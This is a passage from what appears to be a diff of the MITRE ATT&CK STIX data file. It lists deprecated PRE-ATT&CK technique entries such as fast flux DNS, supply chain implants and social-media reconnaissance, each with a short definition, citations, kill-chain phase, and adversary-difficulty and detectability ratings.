"attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate externally facing software applications technologies, languages, and dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).\n\nSoftware applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1261", + "external_id": "T1261" + }, + { + "source_name": "CommonApplicationAttacks", + "description": "Paul Ionescu. (2015, April 8). The 10 Most Common Application Attacks in Action. Retrieved March 5, 2017." + }, + { + "source_name": "WebApplicationSecurity", + "description": "Gregory Leonard. (2016, February). Getting Started with Web Application Security. Retrieved March 5, 2017." + }, + { + "source_name": "SANSTop25", + "description": "SANS Institute. (2011, June 27). CWE/SANS TOP 25 Most Dangerous Software Errors. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing a site to determine the languages/technologies used. If active scanning tools are employed, then the defender has the ability to detect. However, this is typically not acted upon due to the large volume of this type of traffic and it will likely not prompt the defender to take any actionable defense. Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic interaction with the site provides insight into the programming languages/technologies used for a given web site. Additionally many of the active scanning tools will also provide some insight into this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1038", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit public-facing application", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).**\n\nThe use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1377", + "url": "https://attack.mitre.org/techniques/T1377" + }, + { + "description": "PETER BRIGHT. (2013, November 6). Google crawler tricked into performing SQL injection attacks using decade-old technique. Retrieved March 9, 2017.", + "source_name": "GoogleCrawlerSQLInj" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:20:54.394Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1154", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Launching a SQL injection attack is not overly complex and a commonly used technique. This technique, however, requires finding a vulnerable application.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "If the application and network are designed well, the defender should be able to utilize logging and application logic to catch and deflect SQL injection attacks.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Fast Flux DNS", + "description": "**This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).**\n\nA technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1325", + "url": "https://attack.mitre.org/techniques/T1325" + }, + { + "description": "Jamie Riden. (2008, August 16). HOW FAST-FLUX SERVICE NETWORKS WORK. Retrieved March 6, 2017.", + "source_name": "HoneynetFastFlux" + }, + { + "description": "Misnomer. (2012, May 4). RESEARCH TO DETECTION \u2013 IDENTIFY FAST FLUX IN YOUR ENVIRONMENT. Retrieved March 6, 2017.", + "source_name": "MisnomerFastFlux" + }, + { + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "source_name": "MehtaFastFluxPt1" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:03.611Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1102", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Fast flux is generally simple for an adversary to set up and offers several advantages. Such advantages include limited audit trails for defenders to find, ease of operation for an adversary to maintain, and support for main nodes.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as IPS, domain registrars, and service providers are likely in the best position for detection.", + "x_mitre_detectable_by_common_defenses": "Partial" + }, + { + "id": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).\n\nOnce a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1344", + "external_id": "T1344" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1121", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The nature of social media is such that the adversary naturally connects to a target of interest without suspicion, given the purpose of the platform is to promote connections between individuals. Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).\n\nA form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1364", + "external_id": "T1364" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1141", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Connecting with \"friends\" is a fundamental requirement for social media - without it, social media is worthless. An adversary can easily create a profile and request targets to validate the requests.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Users have the ability to detect and report non-authenticated individuals requesting to follow, friend or connect to a target. However the rigidity in validating the users is not typically followed by standard users.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e754fa49-2db1-416b-92db-7f886decd099", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate analyst intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).\n\nAnalysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1234", + "external_id": "T1234" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1011", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hardware or software supply chain implant", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).\n\nDuring production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1365", + "external_id": "T1365" + }, + { + "source_name": "McDRecall", + "description": "Tash Shifrin. (2006, October 16). Malware forces McDonald\u2019s recall of giveaway MP3s. Retrieved March 9, 2017." + }, + { + "source_name": "SeagateMaxtor", + "description": "Brandon Hill. (2007, November 14). Seagate Serves External HDDs with a Side of Virus. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The number of elements and components in a supply chain of HW or SW is vast and detecting an implant is complex for SW, but more complex for HW.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Access to the supply chain by an adversary can be a challenging endeavor, depending on what element is attempting to be subverted.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1142", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Host-based hiding techniques", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).\n\nHost based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1314", + "external_id": "T1314" + }, + { + "source_name": "VirutAP", + "description": "Microsoft Malware Protection Center. (2008, July 30). Virus: Win32/Virut.AP. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques are difficult to detect and might occur in uncommon use-cases (e.g., patching, anti-malware, anti-exploitation software).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the host-based hiding techniques require advanced knowledge combined with an understanding and awareness of the target's environment (e.g., exploiting weaknesses in file formats, parsers and detection capabilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1091", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Human performs requested action of physical nature", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThrough social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1385", + "url": "https://attack.mitre.org/techniques/T1385" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "description": "Taylor Armerding. (2012, October 25). Line blurs between insider, outsider attacks. Retrieved March 9, 2017.", + "source_name": "CSOInsideOutside" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:28.015Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1162", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ill-informed users insert devices into their network that they randomly find, despite training educating them why this is not a wise idea.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Non-hypersensing environments do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify analyst level gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).\n\nAnalysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1233", + "external_id": "T1233" + }, + { + "source_name": "BrighthubGapAnalysis", + "description": "Ronda Bowen. (2014, March 26). Performing a Gap Analysis: Where Do You Begin?. Retrieved March 14, 2017." + }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1010", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business processes/tempo", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).\n\nUnderstanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1280", + "external_id": "T1280" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Current or previous employees may divulge information on the Internet. If insiders are used, the defender may have policies or tools in place to detect loss of this data or knowledge.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "In some cases, this requires some insider knowledge or specialized access to learn when critical operations occur in a corporation. For publicly traded US corporations, there is a lot of open source information about their financial reporting obligations (per SEC). Companies announce their annual shareholder meeting and their quarter phone calls with investors. Information such as this can help the adversary to glean certain aspects of the business processes and/or rhythm.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1057", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).\n\nBusiness relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1272", + "external_id": "T1272" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender. Much of this information is widely known and difficult to obscure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Made easier by today's current social media.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1049", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1283).\n\nBusiness relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1283", + "external_id": "T1283" + }, + { + "source_name": "11StepsAttackers", + "description": "Thor Olavsrud. (2014, September 2). 11 Steps Attackers Took to Crack Target. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Exception to the rule is if the adversary tips off the target that others have been asking about the relationship with them.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process. In some industries, business relationships may be public in order to generate business, but this is not the case for all industries and all relationships.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1060", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d778cb83-2292-4995-b006-d38f52bc1e64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify gap areas", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1225).\n\nLeadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1225", + "external_id": "T1225" + }, + { + "source_name": "ODNIIntegration", + "description": "Office of the Director of National Intelligence. (n.d.). Intelligence Integration - Who Are We. Retrieved March 2, 2017." + }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1002", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--89a79d91-53e0-4ef5-ba28-558cb8b01f76", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify groups/roles", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1270).\n\nPersonnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1270", + "external_id": "T1270" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. May be easier for certain specialty use cases.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1047", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify job postings and needs/gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1248).\n\nJob postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight in to possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1248", + "external_id": "T1248" + }, + { + "source_name": "JobPostingThreat", + "description": "Jay D. Krasnow. (2000, October). The Competitive Intelligence and National Security Threat from Website Job Listings. Retrieved March 16, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing open/public information.", + "x_mitre_difficulty_for_adversary": "Yes", + 